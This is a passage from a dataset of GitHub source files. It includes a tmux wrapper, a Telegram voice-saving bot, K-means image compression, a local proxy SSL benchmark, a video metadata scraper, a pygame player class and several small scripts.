1)) + 1\r\n falsePos = np.sum( np.logical_and( prediction == 1, Y == 0))\r\n falseNeg = np.sum( np.logical_and( prediction == 0, Y == 1))\r\n \r\n precision = np.divide(truePos, truePos + falsePos)\r\n recall = np.divide(truePos, truePos + falseNeg)\r\n \r\n F1[i] = (2 * precision * recall) / (precision + recall)\r\n\r\n\r\n\r\n\r\n print('Normal Costs,', finalCosts)\r\n print('F1 Scores,', F1)\r\n plt.plot(finalCosts)\r\n plt.plot(F1)\r\n plt.show()\r\n\r\n inp = input('Done?')\r\n\r\n\r\nCVTest()\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n# userDecision = 'y'\r\n\r\n# while userDecision == 'y':\r\n\r\n # userDecision = input(\"Look at the next graph? 
y/n \")\r\n \r\n","repo_name":"robbwdoering/AutoFono","sub_path":"metaAnalysisNN.py","file_name":"metaAnalysisNN.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35967092023","text":"# -*- coding: utf-8 -*-\n\"\"\"module for running tmux commands and parsing output thereof.\n\n\"\"\"\n\nimport logging\nimport subprocess\nfrom typing import Dict, List\n\nfrom scry.bin_utils import find_bin_in_path\n\ntmux_binary = find_bin_in_path(\"tmux\")\n\"\"\" str: fully qualified path of tmux binary\n\"\"\"\n\n_TMUX_FORMAT_SEPARATOR = \"__SEPARATOR__\"\n\"\"\" str: Format separator to use for tmux -F format constructions\n\"\"\"\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass TmuxCmd(object):\n def __init__(self, cmd_args: List[str]):\n \"\"\"\n\n Args:\n cmd_args: arguments to pass to tmux binary\n \"\"\"\n\n self._tmux_bin = tmux_binary\n self._tmux_args = cmd_args\n self._cmd_executed: bool = False\n self._cmd: subprocess.CompletedProcess = None\n\n self._execute_cmd()\n\n def _execute_cmd(self) -> None:\n cmd = subprocess.run([self._tmux_bin] + self._tmux_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n _LOGGER.debug(f\"{cmd.stdout}\")\n\n if cmd.returncode != 0:\n raise RuntimeError(f\"tmux returned nonzero with stderr: {cmd.stderr}\")\n\n # Set the executed flag and save the CompletedProcess obj\n self._cmd = cmd\n self._cmd_executed = True\n\n @property\n def stdout(self) -> List[str]:\n if self._cmd_executed:\n stdout = self._cmd.stdout.decode(\"utf-8\")\n return stdout.splitlines()\n\n else:\n raise ValueError(\"tmux command did not execute correctly; no stdout.\")\n\n\nclass TmuxFmtCmd(TmuxCmd):\n \"\"\"Like a regular TmuxCmd object, but we return a parsed stdout from a tmux format\"\"\"\n\n def __init__(self, args: List[str], fmt_keys: List[str]):\n self._fmt_keys = fmt_keys\n\n fmt_string = self._format_tmux_keys(fmt_keys)\n args += [\"-F\", fmt_string]\n\n super(TmuxFmtCmd, self).__init__(args)\n\n @staticmethod\n def _format_tmux_keys(fmt_keys: List[str]) -> str:\n \"\"\"reformat keys to tmux-style '#{key}' strings\"\"\"\n fmt_keys = [f\"#{{{key}}}\" for key in fmt_keys]\n fmt_string = _TMUX_FORMAT_SEPARATOR.join(fmt_keys)\n return fmt_string\n\n @property\n def stdout(self) -> List[Dict[str, str]]:\n if self._cmd_executed:\n _ret = list()\n\n stdout = self._cmd.stdout.decode(\"utf-8\")\n for line in stdout.splitlines():\n _LOGGER.debug(f\"line: {line}\")\n line_vals = line.split(sep=_TMUX_FORMAT_SEPARATOR)\n\n # Create a dict using the fmt_keys as the keys\n _ret.append(dict(zip(self._fmt_keys, line_vals)))\n return _ret\n\n else:\n raise ValueError(\"tmux command did not execute correctly; no stdout.\")\n\n\ndef tmux_create_detached(session_name: str):\n subprocess.run([tmux_binary, \"new-session\", \"-s\", session_name, \"-d\"])\n\n\ndef tmux_attach(session_id: str):\n subprocess.run([tmux_binary, \"attach-session\", \"-t\", session_id])\n","repo_name":"davidr/scry","sub_path":"scry/tmuxcmd.py","file_name":"tmuxcmd.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5225287647","text":"data = open('day04/in4', 'r').read().split('\\n')\n\n# Puzzle1\nl = [tuple(s.replace('-',',').split(',')) for s in data]\nlst = [tuple(int(s) for s in li) for li in l]\ncrit = [i for i,tup in enumerate(lst) if ((tup[0]>=tup[2] and tup[1]<=tup[3]) | (tup[2]>=tup[0] and 
tup[3]<=tup[1])) ]\nprint(f'Result2: {len(c)}')","repo_name":"kjbrak/AoC_2022","sub_path":"day04/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"27688000835","text":"from telegram.ext import Updater\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import MessageHandler, Filters\nimport redis\nimport io\nimport os\n\nr = redis.StrictRedis(host='localhost', port=6379, db=1)\n\n\ndef start(bot, update):\n    bot.send_message(chat_id=update.message.chat_id, text=\"I am a bot that saves voice messages!\")\n\n\ndef save_audio(bot, update):\n    voice_id = update.message.voice.file_id\n    user_id = update.message.from_user.id\n    file = bot.get_file(voice_id)\n    bot.send_message(chat_id=update.message.chat_id, text=\"Saving...\")\n    with io.BytesIO() as buf:\n        file.download(out=buf, timeout=10)\n        r.rpush(str(user_id), buf.getbuffer().tobytes())\n\n\ntoken = os.environ['token']\nupdater = Updater(token=token)\n\ndispatcher = updater.dispatcher\n\nstart_handler = CommandHandler('start', start)\nimg_handler = MessageHandler(Filters.voice, save_audio)\n\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(img_handler)\n\nupdater.start_polling()\n\n","repo_name":"aleksl0l/telegram-bot-savevoice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37784819172","text":"import argparse\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-f\", help=\"Path to file to run verify on\")\n    args = parser.parse_args()\n\n    word_set = set()\n    with open(args.f, 'r') as fp:\n        lines = fp.readlines()\n\n    print(\"Evaluating {} lines\".format(len(lines)))\n\n    dup_count = 0\n\n    for line in lines:\n        if line in word_set:\n            print(\"Found repeated word {}\".format(line))\n            dup_count += 1\n        else:\n            word_set.add(line)\n\n    print(\"Duplicate count {}\".format(dup_count))\n","repo_name":"JamieERMerrill/BoggleSolver","sub_path":"BoggleSolver/scripts/validate_no_repeats.py","file_name":"validate_no_repeats.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37402483920","text":"import random\n\n\ndef converting_graph6(str_graph):\n    byte = str_graph.encode('UTF-8')\n    n = byte[0] - 63\n    graph = {i: [] for i in range(n)}\n    code_string = \"\"\n    for i in range(1, len(byte)):\n        code_string += format(byte[i] - 63, '06b')\n    counter = 0\n    for i in range(1, n):\n        for j in range(i):\n            if code_string[counter] == \"1\":\n                graph[j].append(i)\n                graph[i].append(j)\n            counter += 1\n    vertex = [i for i in range(len(graph))]\n    edges = []\n    for i in range(len(graph)):\n        for j in graph[i]:\n            edges.append((i, j))\n    return vertex, edges\n\n\ndef dominant(graph):\n    vertex, edges = converting_graph6(graph)\n\n    gVertices = {i for i in vertex}\n\n    #print('Vertices in the Graph = ', gVertices)\n    gEdges = edges\n    # iterate over a copy: removing from a list while iterating it skips items\n    for (a, b) in list(gEdges):\n        if (b, a) in gEdges:\n            gEdges.remove((b, a))\n    #print('\\nEdges in the Graph = ', gEdges)\n    yellow = gVertices\n    startVer = random.choice(list(gVertices))\n    Nbr = set()\n    minDOM = set()\n\n    S = set()\n    degrees = dict()\n    connectedMinSet = []\n\n
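    # Greedy dominating-set construction: pick a vertex of maximum degree,\n    # record its closed neighbourhood as one cluster, remove those vertices\n    # and all incident edges, and repeat until no vertex is left.\n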
    while len(gVertices) != 0:\n\n        def findDegrees():\n            for vertex in gVertices:\n                deg = 0\n                for edge in gEdges:\n                    if vertex in edge:\n                        deg = deg + 1\n                degrees[vertex] = deg\n            return degrees\n\n        findDegrees()\n        maxDegree = max(degrees.values())\n        for i in degrees:\n            if degrees.get(i) == maxDegree:\n                S.add(i)\n                maxvertex = i\n\n        nbrmaxvertex = set()\n        nbrmaxvertex.add(maxvertex)\n        gVerticesNew = set()\n        for edg in enumerate(gEdges):\n\n            if edg[1][0] == maxvertex:\n                nbrmaxvertex.add(edg[1][1])\n            elif edg[1][1] == maxvertex:\n                nbrmaxvertex.add(edg[1][0])\n\n        connectedMinSet.append(nbrmaxvertex)\n        gVerticesNew = gVertices - nbrmaxvertex\n        gVertices = gVerticesNew\n\n        # rebuild the edge list instead of removing items while iterating\n        gEdges = [e for e in gEdges if maxvertex not in e]\n\n        degrees = dict()\n\n    return len(connectedMinSet)","repo_name":"lost-20/NIR","sub_path":"Dominant_number.py","file_name":"Dominant_number.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"32032564021","text":"f = open('../3.txt')\nw = [int(s) for s in f.readlines()]\ncountP = 0\nmaxS = -1\nfor i in range(1,len(w)):\n    q = w[i] + w[i-1]\n    if (w[i] % 3 == 0 or w[i-1] % 3 == 0) and q % 5 == 0:\n        countP += 1\n        if q > maxS:\n            maxS = q\nprint(countP, maxS)\nf.close()\n","repo_name":"ivbachantcev/EGEBurg_2022","sub_path":"ПР9. Работа с файлами/Решения/z3.py","file_name":"z3.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"31135142261","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nimport os\nimport colorutils\n\n\nif os.path.exists('README.rst'):\n    description_long = open('README.rst').read()\nelse:\n    description_long = \"\"\" A utility which allows you to work with colors in Python. 
\"\"\"\n\n\nsetup(\n name='colorutils',\n packages=['colorutils'],\n version=colorutils.__version__,\n license=colorutils.__license__,\n description=colorutils.__description__,\n long_description=description_long,\n author=colorutils.__author__,\n author_email=colorutils.__email__,\n url='https://github.com/edaniszewski/colorutils',\n download_url='https://github.com/edaniszewski/colorutils/releases/tag/0.1',\n keywords=['color', 'color manipulation', 'color conversion', 'color tools'],\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Utilities',\n ],\n)","repo_name":"edaniszewski/colorutils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"36261652901","text":"import numpy as np\nimport random\nfrom matplotlib import pyplot as io\nimport os\nimport argparse\nimport numpy.matlib\n\nclass KMeans(object): \n def __init__(self, image_data, file_name, k=10, n_iterations=100):\n self.data = image_data\n self.k = k\n self.n_iterations = n_iterations\n self.f_name = file_name\n\n def prepare_image_vectors(self):\n rows = self.data.shape[0]\n cols = self.data.shape[1]\n vec_data = self.data.reshape(rows*cols, 3)\n return vec_data\n \n def init_centroids(self, data):\n return random.sample(list(data),self.k)\n \n def get_closest_centroids(self, data, centers):\n _size = np.size(data,0)\n idx = np.zeros((_size,1))\n record = np.empty((_size,1))\n for i in range(0,self.k):\n center = centers[i]\n sq_vec = np.power(np.subtract(data,center),2)\n distance = np.sum(sq_vec,axis = 1)\n distance.resize((_size,1))\n record = np.append(record, distance, axis=1)\n record = np.delete(record,0,axis=1)\n idx = np.argmin(record, axis=1)\n return idx\n\n def compute_centroids(self, data, idx):\n n = np.size(data,1)\n centroids = np.zeros((self.k, n))\n for i in range(0,self.k):\n ci = idx==i\n ci = ci.astype(int)\n total_number = sum(ci);\n ci.resize((np.size(data,0),1))\n total_matrix = numpy.matlib.repmat(ci,1,n)\n ci = np.transpose(ci)\n total = np.multiply(data,total_matrix)\n centroids[i] = (1/total_number)*np.sum(total,axis=0)\n return centroids \n \n def create_clusters(self, data, initial_centroids):\n m = np.size(data,0)\n n = np.size(data,1)\n centroids = initial_centroids\n previous_centroids = centroids\n idx = np.zeros((m,1))\n for i in range(1,self.n_iterations):\n idx = self.get_closest_centroids(data, centroids)\n centroids = self.compute_centroids(data, idx)\n return centroids,idx\n\n def save_image(self, image_data):\n img_name = 'output_'+ str(self.f_name) + '_k_' + str(self.k) + '_i_' + str(self.n_iterations) +'.jpg'\n io.imsave('output_'+ str(self.f_name) + '_k_' + str(self.k) + '_i_' + str(self.n_iterations) +'.jpg', image_data)\n print(\"Image {} Compressed with no_of_iterations = {} and k = {}\".format(self.f_name, self.n_iterations, self.k))\n image_compressed = io.imread('output_'+ str(self.f_name) + '_k_' + str(self.k) + '_i_' + str(self.n_iterations) +'.jpg')\n return os.path.getsize(img_name)\n \n def compressed_size(self, image):\n return (image.size)\n \n def fit(self):\n n_rows = self.data.shape[0]\n n_cols = self.data.shape[1]\n compressed_img = np.zeros((n_rows, n_cols, 3), dtype = np.uint8)\n image_vec = 
self.prepare_image_vectors()\n initial_centroids = self.init_centroids(image_vec)\n centroids,idx = self.create_clusters(image_vec, initial_centroids)\n idx = self.get_closest_centroids(image_vec,centroids)\n idx = idx.reshape(n_rows, n_cols)\n for i in range(n_rows):\n for j in range(n_cols):\n compressed_img[i, j, :] = centroids[idx[i, j], :]\n file_size = self.save_image(compressed_img)\n return file_size\n \n \nif __name__ == \"__main__\":\n ### Change Location Here ###\n data_loc = \"/Users/abhishekhosmani/CompSci/College/ML_Anjum/data/assignment5/\"\n summary = {}\n \n def visualize(compression):\n io.figure(figsize=(10,5))\n koala = io.plot(list(compression['koala.jpg'].keys()), list(compression['koala.jpg'].values()), label='koala', marker=\"s\", linewidth=3)\n penguine = io.plot(list(compression['Penguins.jpg'].keys()), list(compression['Penguins.jpg'].values()), label='Penguine', marker=\"o\", linewidth=3)\n io.legend()\n io.ylabel(\" File Size (in Bytes)\")\n io.xlabel(\" No of Clusters (K) \")\n io.show()\n \n files = ['koala.jpg', 'Penguins.jpg']\n for image_file in files:\n performance = {}\n image = io.imread(data_loc+image_file)\n\n for _k in [2,5,10,15,20]:\n model = KMeans(image, k=_k, n_iterations=2, file_name=image_file)\n performance[_k] = model.fit()\n print(\"Finished Compressing the \", image_file)\n summary[image_file] = performance\n visualize(summary)","repo_name":"AbhishekHosmani/ExploringML","sub_path":"ImageCompression_KMeans.py","file_name":"ImageCompression_KMeans.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35134779521","text":"import json\nimport logging\nimport re\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import Union, List\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom i18n.i18n import _\nfrom utils.helpers import prompt_response, prompt_choices, http_get\nfrom utils.string import split_number\n\n\nclass VideoSite(Enum):\n NICO_NICO = \"niconico\"\n BILIBILI = \"bilibili\"\n YOUTUBE = \"YouTube\"\n\n\nclass Video:\n def __init__(self, site: VideoSite, identifier: str, url: str, views: int, uploaded: datetime,\n thumb_url: str = None, canonical: bool = True):\n self.site: VideoSite = site\n self.identifier: str = identifier\n self.url = url\n self.views: int = views\n self.uploaded: datetime = uploaded\n self.thumb_url: str = thumb_url\n self.canonical = canonical\n\n def __str__(self) -> str:\n return f\"VideoSite: {self.site}\\n\" \\\n f\"Id: {self.identifier}\\n\" \\\n f\"Views: {self.views}\\n\" \\\n f\"Uploaded: {self.uploaded}\\n\" \\\n f\"Thumb: {self.thumb_url}\\n\\n\"\n\n\ntable = 'fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'\ntr = {}\nfor index in range(58):\n tr[table[index]] = index\ns = [11, 10, 3, 8, 4, 6]\nxor = 177451812\nadd = 8728348608\n\n\ndef av_to_bv(av: str) -> str:\n x = int(av[2:])\n x = (x ^ xor) + add\n r = list('BV1 4 1 7 ')\n for i in range(6):\n r[s[i]] = table[x // 58 ** i % 58]\n return ''.join(r)\n\n\ndef parse_nc_url(vid: str) -> str:\n if vid.find(\"nicovideo\") != -1:\n vid = vid[vid.rfind(\"/\") + 1:]\n return vid\n\n\ndef get_nc_info(vid: str) -> Video:\n vid = parse_nc_url(vid)\n url = f\"https://www.nicovideo.jp/watch/{vid}\"\n result = http_get(url, use_proxy=True).text\n soup = BeautifulSoup(result, \"html.parser\")\n date = datetime.fromtimestamp(0)\n views = 0\n for script in soup.find_all('script'):\n t: str = script.get_text()\n index_start = 
t.find(\"uploadDate\")\n if index_start != -1:\n index_start += len(\"uploadDate\") + 3\n date = t[index_start:index_start + 10]\n date = str_to_date(date)\n index_start = t.find(\"userInteractionCount\")\n if index_start != -1:\n index_start += len(\"userInteractionCount\") + 2\n index_end = t.find(\"}\", index_start)\n views = int(t[index_start:index_end])\n thumb = soup.find(\"meta\", {\"name\": \"thumbnail\"})['content']\n return Video(VideoSite.NICO_NICO, vid, url, views, date, thumb)\n\n\ndef get_bv(vid: str) -> str:\n search_bv = re.search(\"BV[0-9a-zA-Z]+\", vid, re.IGNORECASE)\n if search_bv is not None:\n return search_bv.group(0)\n search_av = re.search(\"av[0-9]+\", vid, re.IGNORECASE)\n if search_av is not None:\n return av_to_bv(search_av.group(0))\n return vid\n\n\ndef get_bb_info(vid: str) -> Video:\n vid = get_bv(vid)\n url = f\"https://api.bilibili.com/x/web-interface/view?bvid={vid}\"\n response = json.loads(http_get(url, use_proxy=False).text)\n epoch_time = int(response['data']['pubdate'])\n date = datetime.fromtimestamp(epoch_time)\n # remove extra information to be in sync with YT and Nico\n date = datetime(year=date.year, month=date.month, day=date.day)\n pic = response['data']['pic']\n views = response['data']['stat']['view']\n return Video(VideoSite.BILIBILI, vid, url, views, date, pic)\n\n\ndef parse_yt_url(vid: str) -> str:\n if vid.find(\"youtube.\") != -1:\n return vid[vid.find(\"=\") + 1:]\n elif vid.find(\"youtu.be\") != -1:\n return vid[vid.rfind(\"/\") + 1:]\n\n\ndef get_yt_info(vid: str) -> Union[Video, None]:\n vid = parse_yt_url(vid)\n url = 'https://www.youtube.com/watch?v=' + vid\n text = http_get(url, use_proxy=True).text\n soup = BeautifulSoup(text, \"html.parser\")\n interaction = soup.select_one('meta[itemprop=\"interactionCount\"][content]')\n views = int(interaction['content'])\n date = str_to_date(soup.select_one('meta[itemprop=\"datePublished\"][content]')['content'])\n return Video(VideoSite.YOUTUBE, vid, url, views, date,\n thumb_url=\"https://img.youtube.com/vi/{}/maxresdefault.jpg\".format(vid))\n\n\ninfo_func = {\n VideoSite.NICO_NICO: get_nc_info,\n VideoSite.BILIBILI: get_bb_info,\n VideoSite.YOUTUBE: get_yt_info\n}\n\n\ndef view_count_from_site(video: Video) -> str:\n # requires Python 3.10; too many compatibility issues\n # match video.site:\n # case VideoSite.NICO_NICO:\n # return f\"{{{{NiconicoCount|id={video.identifier}}}}}\"\n # case VideoSite.YOUTUBE:\n # return f\"{{{{YoutubeCount|id={video.identifier}|fallback={video.views}+}}}}\"\n # case VideoSite.BILIBILI:\n # return f\"{{{{BilibiliCount|id={video.identifier}}}}}\"\n # case _:\n # return \"ERROR\"\n if video.site == VideoSite.NICO_NICO:\n return f\"{{{{NiconicoCount|id={video.identifier}}}}}\"\n if video.site == VideoSite.YOUTUBE:\n return f\"{{{{YoutubeCount|id={video.identifier}}}}}\"\n if video.site == VideoSite.BILIBILI:\n return f\"{{{{BilibiliCount|id={video.identifier}}}}}\"\n return \"ERROR\"\n\n\ndef video_from_site(site: VideoSite, identifier: str, canonical: bool = True) -> Union[Video, None]:\n logging.info('Fetching video from ' + site.value)\n logging.debug(f\"Video identifier: {identifier}\")\n try:\n v = info_func[site](identifier)\n except Exception as e:\n logging.warning(_(\"fail_fetch\") + site.value)\n logging.debug(\"Detailed exception info: \", exc_info=e)\n v = None\n if not v:\n identifier = parse_yt_url(identifier) if site == VideoSite.YOUTUBE else parse_nc_url(identifier)\n return Video(site, identifier, \"\", 0, datetime.fromtimestamp(0))\n 
v.canonical = canonical\n    return v\n\n\ndef str_to_date(date: str) -> datetime:\n    if 'T' in date:\n        date = date[:date.find('T')]\n    date = date.split(\"-\")\n    if len(date) != 3:\n        logging.warning(_(\"invalid_date\"))\n        return datetime.fromtimestamp(0)\n    year = int(date[0])\n    month = int(date[1])\n    day = int(date[2])\n    return datetime(year=year, month=month, day=day)\n\n\ndef get_video_bilibili() -> Union[Video, None]:\n    bv = prompt_response(_(\"bilibili_link\"))\n    if bv.isspace() or len(bv) == 0:\n        return None\n    if bv:\n        bv_canonical = prompt_choices(_(\"bv_canonical\"), [\"Yes\", \"No\"])\n        bv_canonical = bv_canonical == 1\n        return video_from_site(VideoSite.BILIBILI, bv, bv_canonical)\n\n\ndef get_video(videos: List[Video], site: VideoSite):\n    for v in videos:\n        if v.site == site:\n            return v\n    return None\n\n\ndef only_canonical_videos(videos: List[Video]) -> List[Video]:\n    return [v for v in videos if v.canonical]\n","repo_name":"lihaohong6/MGP-VJ-tool","sub_path":"models/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
{"seq_id":"13723893930","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n    path('hotels/', views.HotelList.as_view(), name='hotel-list'),\n    path('hotels/<int:pk>/', views.HotelDetail.as_view(), name='hotel-detail'),\n    path('roomtypes/', views.RoomTypeList.as_view(), name='roomtype-list'),\n    path('roomtypes/<int:pk>/', views.RoomTypeDetail.as_view(), name='roomtype-detail'),\n    path('bookings/', views.BookingList.as_view(), name='booking-list'),\n    path('bookings/<int:pk>/', views.BookingDetail.as_view(), name='booking-detail'),\n]\n","repo_name":"DrSleep16/hotel_booking","sub_path":"hotel_booking/hotel_reservation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6278003523","text":"from click import command, option, pass_obj\n\nfrom proxy_benchmarks.enums import MimicTypeEnum\nfrom proxy_benchmarks.load_test import run_load_server\nfrom proxy_benchmarks.networking import SyntheticHostDefinition, SyntheticHosts\nfrom proxy_benchmarks.proxies.base import ProxyBase\nfrom proxy_benchmarks.proxies.gomitmproxy import GoMitmProxy\nfrom proxy_benchmarks.proxies.goproxy import GoProxy\nfrom proxy_benchmarks.proxies.martian import MartianProxy\nfrom proxy_benchmarks.proxies.mitmproxy import MitmProxy\nfrom proxy_benchmarks.proxies.node_http_proxy import NodeHttpProxy\nfrom proxy_benchmarks.requests import ChromeRequest, RequestBase\n\n\n@command()\n@option(\"--inspect-browser\", is_flag=True, default=True)\n@pass_obj\ndef basic_ssl_test(obj, inspect_browser: bool):\n    \"\"\"\n    Walk through the different proxy servers and test their SSL validity separately.\n    \n    :param inspect_browser: If true, the test waits after issuing each command for the user to press\n    enter to continue.
 This allows you to fully inspect the certificate in the Chrome inspector\n    and debugging console.\n\n    \"\"\"\n    proxies: list[ProxyBase] = [\n        GoProxy(MimicTypeEnum.STANDARD),\n        GoProxy(MimicTypeEnum.MIMIC),\n        MitmProxy(),\n        NodeHttpProxy(),\n        GoMitmProxy(MimicTypeEnum.STANDARD),\n        GoMitmProxy(MimicTypeEnum.MIMIC),\n        MartianProxy(),\n    ]\n\n    request = ChromeRequest(headless=False, keep_open=inspect_browser)\n    execute_raw(obj, inspect_browser, request, proxies)\n\n\ndef execute_raw(obj, inspect_browser: bool, request: RequestBase, proxies: list[ProxyBase]):\n    console = obj[\"console\"]\n    divider = obj[\"divider\"]\n\n    with run_load_server() as load_server_definition:\n        synthetic_ip_addresses = SyntheticHosts(\n            [\n                SyntheticHostDefinition(\n                    name=\"load-server\",\n                    http_port=load_server_definition[\"http\"],\n                    https_port=load_server_definition[\"https\"],\n                )\n            ]\n        ).configure()\n        synthetic_ip_address = next(iter(synthetic_ip_addresses.values()))\n        print(\"\\nSynthetic IP\", synthetic_ip_address)\n\n        if inspect_browser:\n            print(\"Waiting for manual client access...\")\n            if input(\"  > Press enter when ready...\") != \"\":\n                return\n\n        for proxy in proxies:\n            with proxy.launch():\n                console.print(f\"{divider}\\nTesting {request} with proxy {proxy}\\n{divider}\", style=\"bold blue\")\n                request.handle_request(\n                    f\"https://{synthetic_ip_address}/handle\",\n                    proxy=f\"http://localhost:{proxy.port}\",\n                )\n","repo_name":"piercefreeman/grooveproxy","sub_path":"proxy-benchmarks/proxy_benchmarks/cli/ssl_validity.py","file_name":"ssl_validity.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"}
{"seq_id":"35297882298","text":"import pygame\n\nfrom entity import Entity\n\nANIMATION_TYPES = [\"run\", \"idle\", \"jump\"]\n\n\nclass Player(Entity):\n    def __init__(self, data):\n        super().__init__(data)\n\n        self.state = \"idle\"\n        self.face_direction = \"right\"\n        self.x = self.tiles[0][\"position\"][0][0]  # TODO: fix this\n        self.y = self.tiles[0][\"position\"][0][1]\n\n        self.width = self.tiles[0][\"width\"]\n        self.height = self.tiles[0][\"height\"]\n\n        self.velocity = 0.0\n        self.max_velocity = 10.0\n        self.acceleration = 0.4\n        self.deceleration = 0.4\n\n        self.vertical_velocity = 0.0\n        self.jump_acceleration = -11.0\n        self.gravity = 12.8\n        self.on_ground = True\n\n    def parse(self, tile_data):\n        for _t in tile_data:\n            animation_name = _t[\"type\"].split(\"_\")[1].lower()\n            tile = {\n                \"animation_name\": animation_name,\n                \"current_frame\": 0,\n                \"timer_next_frame\": 0.0,\n                \"id\": _t.get(\"id\"),\n                \"width\": _t.get(\"width\"),\n                \"height\": _t.get(\"height\"),\n                \"position\": _t.get(\"position\", []).copy(),\n                \"sprites\": _t.get(\"sprites\"),\n            }\n\n            self.tiles.append(tile)\n\n    def render(self, screen, block_size):\n        for tile in self.tiles:\n            if self.state == tile[\"animation_name\"]:\n                sprite_to_draw = tile[\"sprites\"][tile[\"current_frame\"]]\n\n                if self.face_direction == \"left\":\n                    sprite_to_draw = pygame.transform.flip(sprite_to_draw, True, False)\n\n                screen.blit(\n                    sprite_to_draw,\n                    (self.x * block_size[0], self.y * block_size[1]),\n                )\n\n    def update(self, delta_time, input_handler, tiles):\n        self.update_state_and_velocity(input_handler)\n        self.update_position(delta_time, tiles)\n        self.update_animation_frames(delta_time)\n\n    def update_state_and_velocity(self, input_handler):\n        if input_handler.is_pressed(\"up\") and self.on_ground:\n            self.vertical_velocity = self.jump_acceleration\n            self.state = 
\"jump\"\n self.on_ground = False\n\n if input_handler.is_pressed(\"left\"):\n self.face_direction = \"left\"\n self.state = \"run\"\n self.velocity = max(-self.max_velocity, self.velocity - self.acceleration)\n elif input_handler.is_pressed(\"right\"):\n self.face_direction = \"right\"\n self.state = \"run\"\n self.velocity = min(self.max_velocity, self.velocity + self.acceleration)\n else:\n self.state = \"idle\"\n self.apply_deceleration()\n\n def apply_deceleration(self):\n if self.velocity > 0:\n self.velocity = max(0, self.velocity - self.deceleration)\n elif self.velocity < 0:\n self.velocity = min(0, self.velocity + self.deceleration)\n\n def update_position(self, delta_time, tiles):\n new_x, new_y = self.calculate_new_positions(delta_time)\n new_x = self.handle_horizontal_collision(new_x, new_y, tiles)\n new_y = self.handle_vertical_collision(new_x, new_y, tiles, delta_time)\n\n self.x = new_x\n self.y = new_y\n\n def calculate_new_positions(self, delta_time):\n new_x = self.x + self.velocity * delta_time\n new_y = self.y + self.vertical_velocity * delta_time\n return new_x, new_y\n\n def handle_horizontal_collision(self, new_x, current_y, tiles):\n player_rect = (new_x * 16, current_y * 16, self.width, self.height)\n for tile in tiles:\n if \"collidable\" in tile and tile[\"collidable\"]:\n for position in tile[\"position\"]:\n tile_rect = (\n position[0] * 16,\n position[1] * 16,\n tile[\"width\"],\n tile[\"height\"],\n )\n if self.check_collision(player_rect, tile_rect):\n return self.x # Reset x position if collision detected\n return new_x # Otherwise, return new x position\n\n def handle_vertical_collision(self, current_x, new_y, tiles, delta_time):\n self.on_ground = False\n player_rect = (current_x * 16, new_y * 16, self.width, self.height)\n for tile in tiles:\n if \"collidable\" in tile and tile[\"collidable\"]:\n for position in tile[\"position\"]:\n tile_rect = (\n position[0] * 16,\n position[1] * 16,\n tile[\"width\"],\n tile[\"height\"],\n )\n if self.check_collision(player_rect, tile_rect):\n self.on_ground = True\n self.vertical_velocity = 0\n return self.y # Reset y position if collision detected\n\n if not self.on_ground:\n self.vertical_velocity += self.gravity * delta_time\n\n return new_y # Otherwise, return new y position\n\n def update_animation_frames(self, delta_time):\n for tile in self.tiles:\n if tile[\"timer_next_frame\"] > delta_time:\n tile[\"current_frame\"] = (tile[\"current_frame\"] + 1) % len(\n tile[\"sprites\"]\n )\n tile[\"timer_next_frame\"] -= delta_time\n else:\n tile[\"timer_next_frame\"] += delta_time\n","repo_name":"lucaslattari/2Do_game_engine","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14645756994","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\nimport random\nimport json\n\n\ndef load_data(filename):\n with open(filename, 'r') as f:\n for line in f:\n yield json.loads(line.strip())\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Split data into train, dev, and test')\n parser.add_argument('json', help='Input data file')\n 